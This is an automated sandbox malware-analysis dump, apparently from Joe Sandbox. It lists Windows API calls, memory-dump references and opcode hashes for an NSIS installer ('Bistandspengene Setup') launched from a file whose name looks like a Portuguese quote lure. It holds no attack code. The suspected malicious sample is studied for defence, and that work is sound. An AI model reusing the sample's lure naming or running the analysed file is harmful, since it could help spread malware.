                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401DD1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3808545654-0
                                                                                                                                                                                                                          • Opcode ID: 300463627e1e3070db780a64cda68b10aef53be99f4a2aa47825be2f225bc760
                                                                                                                                                                                                                          • Instruction ID: 1901d7d296450183f5894fa9bbb5198f988e596920eebf68b9e2cfe033e75292
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 300463627e1e3070db780a64cda68b10aef53be99f4a2aa47825be2f225bc760
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A016271984640FFEB01ABB4AF8AB9A3F75AF65301F104579E541F61E2D97800059B2D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404A15
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                          • Opcode ID: c39695ae270452159a58bdee07ca0e289f121739e597b4873a1b490847d35dae
                                                                                                                                                                                                                          • Instruction ID: 0b736bf888c47b86caf201b097c22cff5488322ea99b5df57e3066faec5b3164
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c39695ae270452159a58bdee07ca0e289f121739e597b4873a1b490847d35dae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9011E773A041283BDB10957D9C41EAF329CAB85334F254237FA25F31D1D978CD2182E9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                          • Opcode ID: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                                                                                                                                                          • Instruction ID: 7183083e97b306686418f33f328e020de39305092e82b8c4ae23370839422ec4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48219071940209BEEF01AFB5CE4AABE7B75EB44744F10403EF601B61D1D6B89A40DB68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,Bistandspengene Setup), ref: 00403C07
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: TextWindow
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe"$1033$Bistandspengene Setup
                                                                                                                                                                                                                          • API String ID: 530164218-2459721172
                                                                                                                                                                                                                          • Opcode ID: 0db0831f5ec28912bcf09a08f50af73a8a69499f9d1cd40cf7ad1787c9be3605
                                                                                                                                                                                                                          • Instruction ID: 847b53d7ec13df621055667e1e13bb36484023f01c55a5fe093bb98d5154ae24
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0db0831f5ec28912bcf09a08f50af73a8a69499f9d1cd40cf7ad1787c9be3605
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0611F035B046118BC3209F15DC40A737BBDEB8971A328417FE901AB3E1CB3DAD028B98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Bistandspengene Setup,NSIS Error), ref: 0040605D
                                                                                                                                                                                                                            • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50, 4Sv,?,C:\Users\user\AppData\Local\Temp\,00405861,?,76533420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                                                                                                                                                            • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                                                                                                                                                            • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50, 4Sv,?,C:\Users\user\AppData\Local\Temp\,00405861,?,76533420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B65
                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50, 4Sv,?,C:\Users\user\AppData\Local\Temp\,00405861,?,76533420,C:\Users\user\AppData\Local\Temp\), ref: 00405B75
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                          • String ID: 4Sv$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          • API String ID: 3248276644-2206058511
                                                                                                                                                                                                                          • Opcode ID: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                                                                                                                                                          • Instruction ID: 63a6569c831ee5581447f3e1e8ec18e6ac74a78ddfb021a14ce772f4501d9fee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32F0F435100E1119D62632361C49BAF2664CF82324B4A023FF952B22D1DB3CB993CC7E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A0A
                                                                                                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A14
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405A26
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A04
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                          • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                                                                                                                                                          • Instruction ID: e6cb25dffc9e5a2bb3a1dbad45cd46e4450efeecdd43702cab0598af126a0af2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06D05E31211534AAC211AB589D05CDB629C9E46304341442AF241B20A1C779595186FE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrlenW.KERNEL32(0042C228,00000000,0041C400,765323A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,0042C228,00000000,0041C400,765323A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrcatW.KERNEL32(0042C228,0040318B), ref: 0040520A
                                                                                                                                                                                                                            • Part of subcall function 004051AF: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040521C
                                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                                                                                                            • Part of subcall function 00405730: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                                                                                                                                                            • Part of subcall function 00405730: CloseHandle.KERNEL32(?), ref: 00405766
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3585118688-0
                                                                                                                                                                                                                          • Opcode ID: 9379c59bfbec92586b7bea6de4fb4a4f736cfbaa92e5777ace76eb21c172b2cc
                                                                                                                                                                                                                          • Instruction ID: 5d6a9cd2629b2ba724fb53646afbed83d489e6abcf8a7a9a4f308d22f643bc11
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9379c59bfbec92586b7bea6de4fb4a4f736cfbaa92e5777ace76eb21c172b2cc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2011AD31900508EBDF21AFA1CD849DE7AB6EF40354F21403BF605B61E1C7798A82DB9E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00403536,?), ref: 00402D9D
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00403536,?), ref: 00402DE6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                                                          • Opcode ID: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                                                                                                                                                                                          • Instruction ID: 9565580f91e6c8b036764476f8379a8a9497e0cf8b36b33943f0ae23fa557cda
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFF05E30501520BBC671AB20FF4DA9B7B64FB40B11701447AF042B15E4C7B80D828B9C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405766
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Error launching installer, xrefs: 00405743
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                                          • Opcode ID: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                                                                                                                                                          • Instruction ID: 828b4cc1025806f2bb1dde6e09e5b56a6c7607ab0cffe69e3a18accb3258c2b6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CE092B4600209BFEB10AB64AE49F7BBBACEB04704F004565BA51F2190D774E8148A6C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,76533420,00000000,C:\Users\user\AppData\Local\Temp\,004037DC,004035F2,?), ref: 0040381E
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00403825
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403804
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
